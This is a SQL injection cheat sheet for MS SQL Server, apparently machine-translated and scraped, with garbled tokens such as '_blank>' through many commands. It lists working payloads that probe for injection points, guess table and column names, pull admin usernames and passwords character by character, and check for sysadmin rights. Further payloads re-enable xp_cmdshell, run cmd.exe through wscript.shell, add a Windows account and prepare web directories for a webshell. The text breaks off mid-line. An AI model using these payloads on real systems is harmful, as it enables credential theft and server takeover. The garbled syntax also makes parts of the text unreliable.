Standard injection statement

1. determine whether there are any injection points
; And 1 = 1 and 1 = 2


2. Generally, the name of a table is admin adminuser user pass password ..
And 0 <> (select count (*) from *)
And 0 <> (select count (*) from admin) --- determine whether the admin table exists

3. If the number of accounts is 0, <return correct page 1 <return error page indicating that the number of accounts is 1
And 0 <(select count (*) from admin)
And 1 <(select count (*) from admin)

4. Add the expected field name to the len () brackets.
And 1 = (select count (*) from admin where len (*)> 0 )--
And 1 = (select count (*) from admin where len (User field name)> 0)
And 1 = (select count (*) from admin where len (_ blank> password field name password)> 0)

5. Guess the length of each field. The length of each field is changed to 0 until the correct page is returned.
And 1 = (select count (*) from admin where len (*)> 0)
And 1 = (select count (*) from admin where len (name)> 6) Error
And 1 = (select count (*) from admin where len (name)> 5) the correct length is 6
And 1 = (select count (*) from admin where len (name) = 6) Correct

And 1 = (select count (*) from admin where len (password)> 11) Correct
And 1 = (select count (*) from admin where len (password)> 12) the error length is 12
And 1 = (select count (*) from admin where len (password) = 12) Correct

6. escape characters
And 1 = (select count (*) from admin where left (name, 1) = a) --- guesses the first place of the user account
And 1 = (select count (*) from admin where left (name, 2) = AB) --- second place of the user account
In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out
And 1 = (select top 1 count (*) from Admin where Asc (mid (pass, 5, 1) = 51 )--
This query statement can be used to guess the chinese user and the _ blank> password. You only need to replace the following number with the Chinese ASSIC code, and then convert the result to a character.

Group by users. id having 1 = 1 --
Group by users. id, users. username, users. password, users. privs having 1 = 1 --
; Insert into users values (666, attacker, foobar, 0 xffff )--

Union select top 1 COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. columns where TABLE_blank> _ NAME = logintable-
Union select top 1 COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. columns where TABLE_blank> _ NAME = logintable WHERE COLUMN_blank> _ name not in (login_blank> _ id )-
Union select top 1 COLUMN_blank> _ name from INFORMATION_blank> _ SCHEMA. columns where TABLE_blank> _ NAME = logintable WHERE COLUMN_blank> _ name not in (login_blank> _ id, login_blank> _ name )-
Union select top 1 login_blank> _ name FROM logintable-
Union select top 1 password FROM logintable where login_blank> _ name = Rahul --

Check _ blank> server patch = SP4 patch hit Error
And 1 = (select @ VERSION )--

Check the permissions of the _ blank> database connection account. The returned result is normal, proving that the permissions are _ blank> sysadmin permissions of the server role.
And 1 = (SELECT IS_blank> _ SRVROLEMEMBER (sysadmin ))--

Determine the connection _ blank> database account. (Using the SA account for connection returns normal = proves that the connection account is SA)
And sa = (SELECT System_blank> _ user )--
And user_blank> _ name () = dbo --
And 0 <> (select user_blank> _ name ()--

Check whether xp_blank> _ empty shell is deleted.
And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE xtype = x and name = xp_blank> _ empty shell )--

Xp_blank> _ restore shell is deleted and restored. It supports absolute path recovery.
; EXEC master. dbo. sp_blank> _ addextendedproc xp_blank> _ mongoshell, xplog70.dll --
; EXEC master. dbo. sp_blank> _ addextendedproc xp_blank> _ mongoshell, c: inetpubwwwrootxplog70.dll --

PING your own lab in reverse order
; Use master; declare @ s int; exec sp_blank> _ oacreate "wscript. shell ", @ s out; exec sp_blank> _ oamethod @ s," run ", NULL," cmd.exe/c ping 192.168.0.1 ";--

Add account
; DECLARE @ shell int exec SP_blank> _ OACREATE wscript. shell, @ shell output exec SP_blank> _ OAMETHOD @ shell, run, null, C: winntsystem3220..exe/c net user jiaoniang $1866574/add --

Create a virtual directory edisk:
; Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, NULL, cscript.exe c: inetpubwwwrootmkwebdir. vbs-w "Default Web site"-v "e", "e :"--

Access attributes: (write a webshell together)
Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, NULL, cscript.exe c: inetpubwwwrootchaccess. vbs-a w3svc/1/ROOT/e + browse


Tip: % 5c = or submit/and modify % 5
And 0 <> (select top 1 paths from newtable )--

Obtain the Database Name (from 1 to 5 is the System id, more than 6 can be determined)
And 1 = (select name from master. dbo. sysdatabases where dbid = 7 )--
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
Submit dbid =, 9... to get more _ blank> database names.

And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U ).
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U and name not in (Admin) to obtain other tables.
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = U and name = admin
And uid> (str (id) the value of the brute-force UID is assumed to be 18779569 uid = id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569) to obtain an admin field, which is assumed to be user_blank> _ id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569 and name not in
(Id,...) to expose other fields
And 0 <(select user_blank> _ id from BBS. dbo. admin where username> 1) Get the user name
In turn, you can get the _ blank> password ..... Assume that user_blank> _ id username, password, and other fields exist.

And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U and name not in (Address ))
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = U and name = admin and uid> (str (id) determine the id value
And & nbs